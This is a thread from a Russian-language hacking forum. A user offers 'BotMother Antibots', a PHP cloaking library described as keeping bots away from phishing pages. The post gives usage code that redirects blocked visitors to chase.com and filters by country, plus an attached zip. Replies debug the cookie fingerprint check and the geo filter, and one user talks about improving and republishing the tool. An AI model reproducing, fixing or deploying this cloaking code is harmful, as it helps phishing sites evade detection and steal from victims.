• XSS.stack #1 – первый литературный журнал от юзеров форума

Мануал/Книга 🤖 BotMother Antibots 🤖

Отслеживать
X-splinter

X-splinter

HDD-drive
Пользователь
Регистрация
20.08.2021
Сообщения
32
Реакции
34
🤖 BotMother Antibots 🤖

🟢BotMother Antibots is used by Phishing Pages to keep Bots away from your Phishing site.

🔑 Features

▶️IP Blocking (Single/Ranges)
▶️Country Blocking
▶️User-Agent Blocking
▶️Cookie Fingerprint (bot don't use cookies)
▶️Header/Agent Deep Checks
▶️Redirection
▶️Logging
▶️Rate Limit Requests (30/minute)
▶️Test Mode for Developer.

👩‍💻 Code Implementation (Assuming the folder is in the current directory as "botMother")

PHP: 
require (__DIR__).'/botMother/botMother.php';
$bm = new botMother();
$bm->setExitLink("https://www.chase.com/"); / Redirect blocked bots to Chase
$bm->setGeoFilter("de,us,fr,uk"); // Allows Germany, USA, France, UK
$bm->setTestMode(false); // Disable test mode (real IP checks)
$bm->limitRequests(30, 60); // 30 requests/minute
$bm->validateHeaders(); // Check for bots/tools
$bm->checkFingerprint(); // Verify JS support (cookie)
$bm->run();

👍 For a example, checkout example.php, use the JavaScript at your Phishing Page, or else don't run "checkFingerprint".

ℹ️ You can put multiple countries on the allow list but also one
 

Вложения

  • botMother.zip
    9.2 КБ · Просмотры: 38
but how is checkFingerprint(); works ?
it will mark everyone as bot.
1) browser opens url and send headers (without cookies)
2) server gives <script>document.cookie = "js_enabled=1; path=/";</script>, now browser have cookies
3) checkFingerprint(); looking for cookies in headers without cookies.
Код: 
if (empty($_COOKIE['js_enabled'])) {
            $this->killBot("No JS support (likely bot)");
        }
in that case everyone is bot. or I missing something ?



and GeoFilter is case sensitive, ip-api returns uppercase, in example - lowercase, so examples not work
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
X-splinter сказал(а):
🤖 BotMother Antibots 🤖

🟢BotMother Antibots is used by Phishing Pages to keep Bots away from your Phishing site.

🔑 Features

▶️IP Blocking (Single/Ranges)
▶️Country Blocking
▶️User-Agent Blocking
▶️Cookie Fingerprint (bot don't use cookies)
▶️Header/Agent Deep Checks
▶️Redirection
▶️Logging
▶️Rate Limit Requests (30/minute)
▶️Test Mode for Developer.

👩‍💻 Code Implementation (Assuming the folder is in the current directory as "botMother")

PHP: 
require (__DIR__).'/botMother/botMother.php';
$bm = new botMother();
$bm->setExitLink("https://www.chase.com/"); / Redirect blocked bots to Chase
$bm->setGeoFilter("de,us,fr,uk"); // Allows Germany, USA, France, UK
$bm->setTestMode(false); // Disable test mode (real IP checks)
$bm->limitRequests(30, 60); // 30 requests/minute
$bm->validateHeaders(); // Check for bots/tools
$bm->checkFingerprint(); // Verify JS support (cookie)
$bm->run();

👍 For a example, checkout example.php, use the JavaScript at your Phishing Page, or else don't run "checkFingerprint".

ℹ️ You can put multiple countries on the allow list but also one
Простенький фильтр aka закос под клоаку. Только непонятно зачем тут рейтлимит.
Интересно. Может улучшу и закину годную версую с набором достойных проверок в паблик)
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх